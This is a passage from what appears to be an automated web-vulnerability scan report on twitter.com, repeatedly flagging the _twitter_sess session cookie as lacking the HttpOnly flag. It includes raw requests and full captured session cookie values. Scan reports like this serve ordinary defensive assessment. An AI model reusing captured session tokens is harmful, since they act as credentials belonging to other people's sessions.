Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

12.62. http://twitter.com/OmnitureEMEA previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/OmnitureEMEA

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzciCmZsYXNoSUM6J0FjdGlvbkNvbnRy%250Ab2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6B2lkIiUwZWU5%250AYmE5M2IzN2U4M2Y4NTU1ODc1MGJjZTQ2Y2E4OToVaW5fbmV3X3VzZXJfZmxv%250AdzA%253D--5d5e0cde97546ff3bb3adffea964a59e2e281451; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OmnitureEMEA HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

12.63. http://twitter.com/PeaceCorps previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/PeaceCorps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PeaceCorps HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

12.64. http://twitter.com/Support previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Support

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Support HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

12.65. http://twitter.com/TakeoSpikes51 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/TakeoSpikes51

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TakeoSpikes51 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

12.66. http://twitter.com/TomorrowCounsel previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/TomorrowCounsel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTRkZWU5Mzk3OTY5YzNlY2U3NmEzNjRkYTVjNWM4ZmE4Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIX9qj4S0B--75323e6281d6e07fad52c4d2694e81f66908fdb8; domain=.twitter.com; path=/
k=173.193.214.243.1296570765453649; path=/; expires=Tue, 08-Feb-11 14:32:45 GMT; domain=.twitter.com
guest_id=129657076796626435; path=/; expires=Thu, 03 Mar 2011 14:32:47 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TomorrowCounsel HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.67. http://twitter.com/VirginiaBeachWk previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/VirginiaBeachWk

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJWZmMzhmYWYzMjhjZDBhZmU3MGI3NGUzMzViZjgwOGYwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIIuSj4S0B--feaf2307ccc3ef42a4424cc41ad061fc85bcfc4c; domain=.twitter.com; path=/
k=173.193.214.243.1296570767721275; path=/; expires=Tue, 08-Feb-11 14:32:47 GMT; domain=.twitter.com
guest_id=129657077046596591; path=/; expires=Thu, 03 Mar 2011 14:32:50 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /VirginiaBeachWk HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.68. http://twitter.com/Wyome655 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Wyome655

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTlhODFlYTZmZDMyOTVmOGEzNjU1YWQyOGVkYzU1NTdkIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsII%252Bqj4S0B--3dc2a7877e1c46c038d07097aebde48d6ed83ef5; domain=.twitter.com; path=/
k=173.193.214.243.1296570769541250; path=/; expires=Tue, 08-Feb-11 14:32:49 GMT; domain=.twitter.com
guest_id=129657077200155260; path=/; expires=Thu, 03 Mar 2011 14:32:52 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Wyome655 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.69. http://twitter.com/about previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/about

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.70. http://twitter.com/about/contact previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/about/contact

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.71. http://twitter.com/about/resources previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/about/resources

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.72. http://twitter.com/account/complete previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/account/complete

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.73. http://twitter.com/account/resend_password previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/account/resend_password

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.74. http://twitter.com/arnui previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/arnui

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTQ5N2RiZWUxOWRkZWQ0YmQ3ZTEyMGFjMzE2NDc0Mzg4Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIflKk4S0B--47bfbc59ed0e9d5c07285a54ffa9822cfa655e62; domain=.twitter.com; path=/
k=173.193.214.243.1296570798704449; path=/; expires=Tue, 08-Feb-11 14:33:18 GMT; domain=.twitter.com
guest_id=129657079871539029; path=/; expires=Thu, 03 Mar 2011 14:33:18 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /arnui HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.75. http://twitter.com/ashleytisdale previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/ashleytisdale

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ashleytisdale HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

12.76. http://twitter.com/best_golf previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/best_golf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTg0NDU2NzMyMGRkNmVhMmVmM2E3OTY3MzEzNDRhNmY3Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIv%252Bqj4S0B--d65ee02c97fc9e9f3fae0cf9021c58b815ea69b0; domain=.twitter.com; path=/
k=173.193.214.243.1296570769287275; path=/; expires=Tue, 08-Feb-11 14:32:49 GMT; domain=.twitter.com
guest_id=12965707721577760; path=/; expires=Thu, 03 Mar 2011 14:32:52 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /best_golf HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.77. http://twitter.com/business previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/business

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 301 Moved Permanently
Date: Wed, 02 Feb 2011 16:31:49 GMT
Server: hi
Status: 301 Moved Permanently
X-Transaction: 1296664309-5763-17985
Last-Modified: Wed, 02 Feb 2011 16:31:49 GMT
Location: http://business.twitter.com/
X-Runtime: 0.01329
Content-Type: text/html; charset=utf-8
Content-Length: 94
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<html><body>You are being <a href="http://business.twitter.com/">redirected</a>.</body></html>

12.78. http://twitter.com/buyantsogtoo previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/buyantsogtoo

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJWQ2NzZkMGVmMDMxYmNiN2IxZjBmOTdmN2VhMTRhZjMzIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIwVOk4S0B--7af583231980c89fe8b1a8b6c0b84deaf067171e; domain=.twitter.com; path=/
k=173.193.214.243.1296570799027712; path=/; expires=Tue, 08-Feb-11 14:33:19 GMT; domain=.twitter.com
guest_id=1296570799040535; path=/; expires=Thu, 03 Mar 2011 14:33:19 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /buyantsogtoo HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.79. http://twitter.com/chain_llc previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/chain_llc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTNkOGIzZjA0MzgzOTVmMjU4NjQyMDQwZjA1NTg1MzBmIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIsNuj4S0B--862e59bb3bd797cae7bb00e4d5f0ae979dd432a7; domain=.twitter.com; path=/
k=173.193.214.243.1296570765904767; path=/; expires=Tue, 08-Feb-11 14:32:45 GMT; domain=.twitter.com
guest_id=12965707683009389; path=/; expires=Thu, 03 Mar 2011 14:32:48 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /chain_llc HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.80. http://twitter.com/chain_llc_cod previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/chain_llc_cod

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTMwMzMxNzg4MGI3NmU0YzUzNWMyODY2OWI5YTE0YmZhIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIZTuk4S0B--8fef274b328043273d28c9d450850d5560e59e88; domain=.twitter.com; path=/
k=173.193.214.243.1296570792676013; path=/; expires=Tue, 08-Feb-11 14:33:12 GMT; domain=.twitter.com
guest_id=129657079280389025; path=/; expires=Thu, 03 Mar 2011 14:33:12 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /chain_llc_cod HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.81. http://twitter.com/chain_llc_mg previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/chain_llc_mg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTI3MjVhMGJiZTQ1ZDk4ZGZhMTRlMjQyM2E4Y2VmY2QyIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIpduj4S0B--efc213a9b24ebd70cca35dda557409a2fd957e56; domain=.twitter.com; path=/
k=173.193.214.243.1296570765567580; path=/; expires=Tue, 08-Feb-11 14:32:45 GMT; domain=.twitter.com
guest_id=129657076829194484; path=/; expires=Thu, 03 Mar 2011 14:32:48 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /chain_llc_mg HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.82. http://twitter.com/cloudscan previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/cloudscan

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

